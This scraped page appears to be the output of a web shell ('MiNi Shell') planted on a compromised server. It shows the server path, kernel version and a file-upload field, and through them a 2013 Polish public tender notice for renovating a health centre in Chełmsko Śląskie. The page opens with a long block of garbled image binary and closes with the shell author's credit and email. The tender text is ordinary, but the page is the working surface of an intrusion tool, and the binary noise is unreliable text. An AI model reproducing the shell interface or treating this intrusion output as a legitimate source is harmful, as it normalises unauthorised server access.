JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130207/19783-N-2013.html

<p class="kh_header"><b>Lubawka: Przebudowa, termomodernizacja, budynku Ośrodka Zdrowia w Chełmsku Śląskim 
przy ul. Lubawskiej nr 26, na działce nr 35, obręb Chełmsko Śląskie</b><br>
<b>Numer ogłoszenia: 19783 - 2013; data zamieszczenia: 07.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej (SP ZOZ) w Lubawce , ul. Kościuszki 19, 58-420 Lubawka, woj. dolnośląskie, tel. 0-75 74 11 702, faks 0-75 74 11 702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lubawka.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa, termomodernizacja, budynku Ośrodka Zdrowia w Chełmsku Śląskim 
przy ul. Lubawskiej nr 26, na działce nr 35, obręb Chełmsko Śląskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa i termomodernizacja budynku Ośrodka Zdrowia
    w Chełmsku Śląskim położonym przy ul. Lubawskiej nr 26, na działce nr 35 o powierzchni
    zabudowy 173,28 m2 i kubaturze obiektu 1388,94 m3. 
    Bryła budynku pozostanie bez zmian.
    Termomodernizacja polegać będzie na ociepleniu budynku w obrębie pomieszczeń 
    ogrzewanych, wymianie stolarki okiennej i drzwiowej, wymianie instalacji centralnego
    ogrzewania i ciepłej wody użytkowej wraz ze zmianą źródła ciepła. W ramach prac należy
    wykonać izolację przeciwwilgociową ścian fundamentowych i wymienić pokrycie dachu.
    Przed wejściem głównym należy zamontować platformę schodową dla osób
     niepełnosprawnych i wymienić drzwi wejściowe do budynku. 
     Roboty budowlane zawierają również dostawę i montaż urządzeń.
 2. Zakres robót obejmuje:
     2.1 roboty terenowe na działce nr 35,
     2.2 roboty  wewnątrz i na zewnątrz budynku obejmujące branże: budowlaną, sanitarną i
           elektryczną.
 3. Szczegółowy zakres robót obejmuje:
    3.1 Roboty budowlane:
          - izolacja pionowa ścian fundamentowych na zewnątrz (wokół budynku),
          - posadzka w pomieszczeniu kotłowni,
          - zszycie pęknięć na ścianach nośnych budynku,
          - wzmocnienie konstrukcji dachu,
          - pokrycie dachów (dachówka i papa zgrzewalna), 
          - obróbki blacharskie i rynny,
          - przemurowanie kominów ponad dachem,
          - wymiana drzwi wejściowych do budynku i drzwi do kotłowni,
          - wymiana stolarki okiennej w całym budynku z wyjątkiem piwnicy wraz z parapetami 
             zewnętrznymi i wewnętrznymi,
          - ocieplenie dachów płaskich (od góry),
          - ocieplenie budynku,
          - kolorystyka budynku,
          - platforma schodowa;
    3.2 Instalacje sanitarne:
          - wymiana instalacji wody zimnej,
          - wymiana instalacji ciepłej wody użytkowej,
          - wymiana instalacji cyrkulacji,
          - wymiana instalacji centralnego ogrzewania,
          - nowe źródło ciepła zasilane z pompy ciepła typu glikol - woda z pionowym
           gruntowym wymiennikiem, wyposażone w wymagane urządzenia, z pełną automatyką;
    3.3 Roboty elektryczne:
          - wykonanie nowych instalacji zasilania elektrycznego urządzeń źródła ciepła
            w tym pompy ciepła i podgrzewacza c.w.u. oraz platformy schodowej,
          - przebudowa istniejącej instalacji odgromowej z uwagi na wykonanie ocieplenia ścian
            zewnętrznych i odkrycie fundamentów;
    3.4 Roboty terenowe, geologiczne, związane będą z wykonaniem otworów
          technologicznych w celu wykorzystania ciepła Ziemi:
          - w celu zabudowy pionowego wymiennika ciepła o sumarycznej długości 700 m.
            przyjęto do wykonania  7 otworów technologicznych o głębokości 100 m każdy.
    Roboty ogólnobudowlane i geologiczne należy prowadzić i wykonać zgodnie z
    następującymi dokumentami:
    - zatwierdzonym projektem budowlanym opracowanym przez Zakład Usług Techniczno-
      Budowlanych S.c. z Kamiennej Góry, stanowiącym załącznik do pozwolenia na
      budowę (decyzja nr 219/12 Starosty Kamiennogórskiego z dnia 27.09.2012 r.)
    - projektem wykonawczym opracowanym przez firmę j.w., 
    - projektem robót geologicznych opracowanym przez Spółkę Geojust z Wrocławia, do
      którego Starostwo Powiatowe w Kamiennej Górze nie wniosło sprzeciwu 
      (pismo nr OŚ.6530.8.2012 z 12.09.2012 r.),
    - przedmiarem robót,
    - specyfikacjami technicznymi wykonania i odbioru robót
    - wytycznymi ujętymi w opracowanych ekspertyzach pod kątem występowania
       miejsc gniazdowania oraz schronień ptaków chronionych (2 szt.)
4. Roboty budowlane prowadzone będą w czynnym budynku ośrodka zdrowia, a więc w celu
    zachowania bezpieczeństwa pracowników ośrodka zdrowia, pacjentów i wszystkich
     innych osób korzystających z obiektu, Wykonawca zobowiązany będzie do właściwego,
    odpowiedniego i wystarczającego, zabezpieczenia prowadzonych robót.
5. Zaleca się Wykonawcom, na własny koszt, dokonania wizji lokalnej terenu planowanych
    robót i jego otoczenia celem zdobycia dodatkowych informacji związanych z
    zamówieniem.
6. Jakość dostarczonych na budowę materiałów, wyrobów i elementów musi być 
     zgodna z wymaganiami normowymi, atestami, świadectwami dopuszczenia do
     stosowania i ustaleniami projektu technicznego oraz wymaganiami zawartymi w     SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.50.00-7, 45.11.10.00-8, 45.26.10.00-4, 45.26.20.00-1, 45.32.10.00-3, 45.33.11.00-7, 45.33.20.00-3, 45.33.10.00-6, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium w wysokości  10 000,00 zł (słownie: dziesięć tysięcy złotych) najpóźniej do dnia  25 lutego 2013 r. do godziny 12.00 Decyduje data i godzina wpływu środków do Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na podstawie oświadczenia o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na podstawie oświadczenia o spełnianiu tego warunku oraz
     - na podstawie wykonanych robót budowlanych w okresie ostatnich pięciu lat 
       przed upływem terminu składania ofert, a jeżeli okres prowadzenia
       działalności jest krótszy - w tym okresie.
Zamawiający uzna warunek za spełniony, gdy Wykonawca udokumentuje, że wykonał w tym okresie minimum 2 (dwa) zamówienia związane z przebudową lub budową obiektów kubaturowych o wartości co najmniej 200.000 zł  (dwieście tysięcy złotych z podatkiem VAT) każde z wykonanych zamówień</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na podstawie oświadczenia o spełnianiu tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na podstawie oświadczenia o spełnianiu tego warunku oraz
     - na podstawie ubezpieczenia od odpowiedzialności cywilnej w zakresie
       prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający
       uzna warunek za spełniony, jeżeli wysokość ubezpieczenia wynosić będzie
       minimum 200 000 zł</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- na podstawie oświadczenia o spełnianiu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość zmiany
    zawartej umowy w następujących okolicznościach:
1)	Zmiana umowy jest nieistotna i nie dotyczy treści oferty, na podstawie której dokonano wyboru wykonawcy, a zmiana nieistotna rozumiana jest w ten sposób, że wiedza o jej wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie czy też na wynik postępowania;
2)	Zmiana umowy jest istotna w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, pod następującymi warunkami:
a) zmiana umowy wywołana została przyczynami zewnętrznymi, które w sposób
    obiektywny uzasadniają potrzebę tej zmiany, oraz:
    - nie powoduje zachwiania równowagi ekonomicznej pomiędzy wykonawcą a
      zamawiającym, 
    - nie powoduje zachwiania pozycji konkurencyjnej wykonawcy w stosunku do
      innych wykonawców biorących udział w postępowaniu jak też nie prowadzi do
      zmiany kręgu wykonawców zdolnych do wykonania zamówienia lub
      zainteresowanych udziałem w postępowaniu;
b) występuje zgodna wola stron umowy na jej wprowadzenie;
3.	Przed dokonaniem zmiany zawartej umowy Zamawiający dokona oceny istotności 
      zmiany w odniesieniu do realiów danego przypadku, uwzględniając konieczność
      zachowania podstawowych zasad procedur udzielania zamówień publicznych, tj: 
      - zasady uczciwej konkurencji,
      - zasady równego traktowania wykonawców,
      - zasady przejrzystości;
4)  Szczegółowy zakres dopuszczalnych zmian i warunki ich wprowadzenia do umowy
są następujące:
            a) zmiana terminu realizacji przedmiotu umowy w przypadku:
                - zawieszenia robót budowlanych przez Zamawiającego,
                - zmian dokumentacji projektowej, dokonywanych na wniosek Zamawiającego
                   lub zgłaszanych i zaakceptowanych przez Zamawiającego,
                - konieczności wykonania robót dodatkowych o których mowa w art. 67 ust. 1 pkt 5 
                   lit. b</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lubawka.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można otrzymać u Zamawiającego SP ZOZ w Lubawce ul. Kościuszki 19 (II piętro administracja) w cenie 50 zł lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 12:00, miejsce: SP ZOZ w Lubawce ul. Kościuszki 19 (II piętro administracja). Zamawiający otworzy koperty z ofertami w swojej siedzibie w dniu 25.02.2013 r. o godz 12.15 w gabinecie Dyrektora (II p.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com